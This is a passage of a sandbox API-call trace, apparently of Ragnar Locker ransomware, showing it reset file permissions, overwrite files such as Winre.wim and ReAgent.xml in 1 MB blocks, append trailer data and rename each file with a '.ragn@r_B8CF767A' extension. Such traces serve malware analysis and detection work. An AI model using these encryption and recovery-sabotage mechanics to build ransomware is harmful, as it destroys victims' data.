lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.ragn@r_B8CF767A" [0166.698] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 175 os_tid = 0x79c [0166.689] GetNamedSecurityInfoW () returned 0x0 [0166.690] SetEntriesInAclW () returned 0x0 [0166.690] SetNamedSecurityInfoW () returned 0x0 [0166.690] LocalFree (hMem=0x3592b18) returned 0x0 [0166.690] LocalFree (hMem=0x3592b2c) returned 0x3592b2c [0166.690] LocalFree (hMem=0x3547f80) returned 0x0 [0166.690] GetFileAttributesW (lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "d:\\recovery\\windowsre\\reagent.xml")) returned 0x2026 [0166.690] CreateFileW (lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "d:\\recovery\\windowsre\\reagent.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f0 [0166.690] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x603fb88 | out: lpFileSize=0x603fb88*=1085) returned 1 [0166.691] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x42e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.691] GetProcessHeap () returned 0x3520000 [0166.691] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584da8 [0166.691] ReadFile (in: hFile=0x3f0, lpBuffer=0x3584da8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x603fb40, lpOverlapped=0x0 | out: lpBuffer=0x3584da8*, lpNumberOfBytesRead=0x603fb40*=0xf, lpOverlapped=0x0) returned 1 [0166.700] VirtualAlloc (lpAddress=0x0, dwSize=0x43d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0166.701] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.701] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x603fb5c | out: lpNewFilePointer=0x0) returned 1 [0166.701] ReadFile (in: hFile=0x3f0, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x43d, lpNumberOfBytesRead=0x603fb30, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x603fb30*=0x43d, lpOverlapped=0x0) returned 1 [0166.701] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x603fb34 | out: lpNewFilePointer=0x0) returned 1 [0166.701] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x43d, nNumberOfBytesToLockHigh=0x0) returned 1 [0166.701] WriteFile (in: hFile=0x3f0, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x43d, lpNumberOfBytesWritten=0x603fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x603fb2c*=0x43d, lpOverlapped=0x0) returned 1 [0166.701] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x43d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0166.701] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.701] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x43d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.702] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0166.702] WriteFile (in: hFile=0x3f0, lpBuffer=0x35e90a4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x603fb6c, lpOverlapped=0x0 | out: lpBuffer=0x35e90a4*, lpNumberOfBytesWritten=0x603fb6c*=0x100, lpOverlapped=0x0) returned 1 [0166.702] WriteFile (in: hFile=0x3f0, lpBuffer=0x35e91a4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x603fb6c, lpOverlapped=0x0 | out: lpBuffer=0x35e91a4*, lpNumberOfBytesWritten=0x603fb6c*=0x100, lpOverlapped=0x0) returned 1 [0166.702] WriteFile (in: hFile=0x3f0, lpBuffer=0x603fb70*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x603fb6c, lpOverlapped=0x0 | out: lpBuffer=0x603fb70*, lpNumberOfBytesWritten=0x603fb6c*=0xf, lpOverlapped=0x0) returned 1 [0166.702] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0166.702] GetProcessHeap () returned 0x3520000 [0166.702] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584da8 | out: hHeap=0x3520000) returned 1 [0166.702] CloseHandle (hObject=0x3f0) returned 1 [0166.702] lstrcpyW (in: lpString1=0x603f6dc, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml") returned="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" [0166.702] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml.ragn@r_B8CF767A") returned="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml.ragn@r_B8CF767A" [0166.702] MoveFileExW (lpExistingFileName="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "d:\\recovery\\windowsre\\reagent.xml"), lpNewFileName="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml.ragn@r_B8CF767A" (normalized: "d:\\recovery\\windowsre\\reagent.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 176 os_tid = 0xd84 [0166.704] GetNamedSecurityInfoW () returned 0x0 [0166.704] SetEntriesInAclW () returned 0x0 [0166.704] SetNamedSecurityInfoW () returned 0x0 [0166.705] LocalFree (hMem=0x3592b18) returned 0x0 [0166.705] LocalFree (hMem=0x3592b2c) returned 0x3592b2c [0166.705] LocalFree (hMem=0x3547f80) returned 0x0 [0166.705] GetFileAttributesW (lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "d:\\recovery\\windowsre\\winre.wim")) returned 0x2026 [0166.705] CreateFileW (lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "d:\\recovery\\windowsre\\winre.wim"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f0 [0166.705] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x617f9d4 | out: lpFileSize=0x617f9d4*=491777489) returned 1 [0166.705] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x1d4fedc2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.705] GetProcessHeap () returned 0x3520000 [0166.705] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d60 [0166.705] ReadFile (in: hFile=0x3f0, lpBuffer=0x3584d60, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x617f98c, lpOverlapped=0x0 | out: lpBuffer=0x3584d60*, lpNumberOfBytesRead=0x617f98c*=0xf, lpOverlapped=0x0) returned 1 [0166.715] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x5e00000 [0166.715] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.715] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0166.715] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0167.445] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0167.455] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0167.455] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0167.461] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0167.461] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0167.719] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x200000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0167.730] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0167.730] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0168.073] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.073] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0168.074] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0168.126] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x400000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0168.315] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.315] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0168.320] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.320] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0168.320] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0168.514] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x600000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0168.523] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.523] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0168.528] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.528] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0168.528] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0168.707] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x800000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0168.717] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.717] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0168.721] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.721] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0168.722] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0168.854] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xa00000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0168.862] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.862] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0168.866] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.866] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0168.866] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0169.057] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xc00000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0169.071] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.071] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0169.201] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.201] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0169.201] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0169.271] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xe00000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0169.385] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.385] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0169.401] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.401] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x100000, lpNewFilePointer=0x0, dwMoveMethod=0x617f9a8 | out: lpNewFilePointer=0x0) returned 1 [0169.401] ReadFile (in: hFile=0x3f0, lpBuffer=0x5e00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x617f97c, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesRead=0x617f97c*=0x100000, lpOverlapped=0x0) returned 1 [0169.553] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x1000000, lpNewFilePointer=0x0, dwMoveMethod=0x617f980 | out: lpNewFilePointer=0x0) returned 1 [0169.564] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.564] WriteFile (in: hFile=0x3f0, lpBuffer=0x5e00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x617f978, lpOverlapped=0x0 | out: lpBuffer=0x5e00000*, lpNumberOfBytesWritten=0x617f978*=0x100000, lpOverlapped=0x0) returned 1 [0169.569] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.569] VirtualFree (lpAddress=0x5e00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.578] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x1d4fedd1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.578] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.578] WriteFile (in: hFile=0x3f0, lpBuffer=0x35f621c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x617f9b8, lpOverlapped=0x0 | out: lpBuffer=0x35f621c*, lpNumberOfBytesWritten=0x617f9b8*=0x100, lpOverlapped=0x0) returned 1 [0169.579] WriteFile (in: hFile=0x3f0, lpBuffer=0x35f631c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x617f9b8, lpOverlapped=0x0 | out: lpBuffer=0x35f631c*, lpNumberOfBytesWritten=0x617f9b8*=0x100, lpOverlapped=0x0) returned 1 [0169.579] WriteFile (in: hFile=0x3f0, lpBuffer=0x617f9bc*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x617f9b8, lpOverlapped=0x0 | out: lpBuffer=0x617f9bc*, lpNumberOfBytesWritten=0x617f9b8*=0xf, lpOverlapped=0x0) returned 1 [0169.579] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.579] GetProcessHeap () returned 0x3520000 [0169.579] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d60 | out: hHeap=0x3520000) returned 1 [0169.579] CloseHandle (hObject=0x3f0) returned 1 [0169.580] lstrcpyW (in: lpString1=0x617f528, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim") returned="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" [0169.580] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim.ragn@r_B8CF767A") returned="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim.ragn@r_B8CF767A" [0169.580] MoveFileExW (lpExistingFileName="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "d:\\recovery\\windowsre\\winre.wim"), lpNewFileName="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim.ragn@r_B8CF767A" (normalized: "d:\\recovery\\windowsre\\winre.wim.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 178 os_tid = 0xa88 [0167.385] GetNamedSecurityInfoW () returned 0x0 [0167.387] SetEntriesInAclW () returned 0x0 [0167.387] SetNamedSecurityInfoW () returned 0x0 [0167.388] LocalFree (hMem=0x3592b18) returned 0x0 [0167.388] LocalFree (hMem=0x3592b2c) returned 0x3592b2c [0167.388] LocalFree (hMem=0x3592f20) returned 0x0 [0167.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 0x20 [0167.388] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x384 [0167.389] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x62bfba8 | out: lpFileSize=0x62bfba8*=40) returned 1 [0167.389] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.389] GetProcessHeap () returned 0x3520000 [0167.390] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584dd8 [0167.390] ReadFile (in: hFile=0x384, lpBuffer=0x3584dd8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x62bfb60, lpOverlapped=0x0 | out: lpBuffer=0x3584dd8*, lpNumberOfBytesRead=0x62bfb60*=0xf, lpOverlapped=0x0) returned 1 [0167.391] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0167.392] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.392] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x62bfb7c | out: lpNewFilePointer=0x0) returned 1 [0167.392] ReadFile (in: hFile=0x384, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x62bfb50, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x62bfb50*=0x28, lpOverlapped=0x0) returned 1 [0167.393] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x62bfb54 | out: lpNewFilePointer=0x0) returned 1 [0167.393] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x28, nNumberOfBytesToLockHigh=0x0) returned 1 [0167.393] WriteFile (in: hFile=0x384, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x62bfb4c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x62bfb4c*=0x28, lpOverlapped=0x0) returned 1 [0167.393] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x28, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0167.393] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.394] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.394] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0167.394] WriteFile (in: hFile=0x384, lpBuffer=0x5d4a144*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x62bfb8c, lpOverlapped=0x0 | out: lpBuffer=0x5d4a144*, lpNumberOfBytesWritten=0x62bfb8c*=0x100, lpOverlapped=0x0) returned 1 [0167.394] WriteFile (in: hFile=0x384, lpBuffer=0x5d4a244*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x62bfb8c, lpOverlapped=0x0 | out: lpBuffer=0x5d4a244*, lpNumberOfBytesWritten=0x62bfb8c*=0x100, lpOverlapped=0x0) returned 1 [0167.394] WriteFile (in: hFile=0x384, lpBuffer=0x62bfb90*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x62bfb8c, lpOverlapped=0x0 | out: lpBuffer=0x62bfb90*, lpNumberOfBytesWritten=0x62bfb8c*=0xf, lpOverlapped=0x0) returned 1 [0167.394] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0167.395] GetProcessHeap () returned 0x3520000 [0167.395] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584dd8 | out: hHeap=0x3520000) returned 1 [0167.395] CloseHandle (hObject=0x384) returned 1 [0167.396] lstrcpyW (in: lpString1=0x62bf6fc, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0167.396] lstrcatW (in: 